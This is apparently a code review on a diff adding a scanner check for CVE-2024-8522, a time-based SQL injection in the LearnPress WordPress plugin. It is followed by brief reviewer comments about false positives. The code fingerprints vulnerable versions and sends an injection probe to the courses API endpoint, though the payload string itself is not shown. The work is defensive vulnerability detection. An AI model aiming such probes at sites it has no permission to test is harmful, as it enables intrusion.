agent/exploits/cve_2024_8522.py

```diff
@@ -0,0 +1,142 @@
+        },
+        recommendation=(
+            "- Ensure that the LearnPress plugin is updated to the latest version.\n"
+            "- Apply any available security patches from the software vendor."
+        ),
+        security_issue=True,
+        privacy_issue=True,
+        has_public_exploit=False,
+        targeted_by_malware=False,
+        targeted_by_ransomware=False,
+        targeted_by_nation_state=False,
+    )
+    technical_detail = (
+        f"{target} is vulnerable to {VULNERABILITY_REFERENCE}, "
+        f"{VULNERABILITY_TITLE}"
+    )
+    vulnerability = definitions.Vulnerability(
+        entry=entry,
+        technical_detail=technical_detail,
+        risk_rating=agent_report_vulnerability_mixin.RiskRating.CRITICAL,
+    )
+    return vulnerability
+
+
+@exploits_registry.register
+class LearnPressSQLInjectionExploit(definitions.Exploit):
+    accept_request = definitions.Request(
+        method="GET", path="/wp-content/plugins/learnpress/readme.txt"
+    )
+    check_request = definitions.Request(
+        method="GET", path="/wp-json/learnpress/v1/courses"
+    )
+
+    match_pattern = [re.compile("learnpress")]
+    accept_pattern = [
+        re.compile(f"Stable tag: {version}") for version in VULNERABLE_VERSIONS
+    ]
+
+    metadata = definitions.VulnerabilityMetadata(
+        title=VULNERABILITY_TITLE,
+        description=VULNERABILITY_DESCRIPTION,
+        reference=VULNERABILITY_REFERENCE,
+        risk_rating=RISK_RATING,
+    )
+
+    def accept(self, target: definitions.Target) -> bool:
+        """Checks if the target is running a vulnerable version of LearnPress plugin.
+
+        Args:
+            target: The target to check.
+
+        Returns:
+            True if the target is running a vulnerable version, else False.
+        """
+        try:
+            version_resp = requests.get(
+                urlparse.urljoin(
+                    target.origin, "/wp-content/plugins/learnpress/readme.txt"
+                ),
+                timeout=10,
+            )
+            version_text = version_resp.text
+
+            if any(re.search(pattern, version_text) for pattern in self.accept_pattern):
+                return True
+            return False
+        except requests_exceptions.RequestException as e:
+            logging.error("Error fetching LearnPress version: %s", e)
+            return False
+
+    def check(self, target: definitions.Target) -> list[definitions.Vulnerability]:
+        """Tests for SQL Injection in the LearnPress Plugin.
+
+        Args:
+            target: The target to test.
+
+        Returns:
+            A list of vulnerabilities found, if any.
+        """
+        try:
+            sqli_url = urlparse.urljoin(
+                target.origin, f"/wp-json/learnpress/v1/courses?{PAYLOAD}"
+            )
+
+            sqli_resp = requests.get(sqli_url, timeout=30)
+
+            if sqli_resp.elapsed.total_seconds() > 10:
```

Comment:
you may want to check if the server response time in a normal case is not slow to avoid FP

Reply:
how do you suggest to do so?

Reply:
10 seconds is good enough.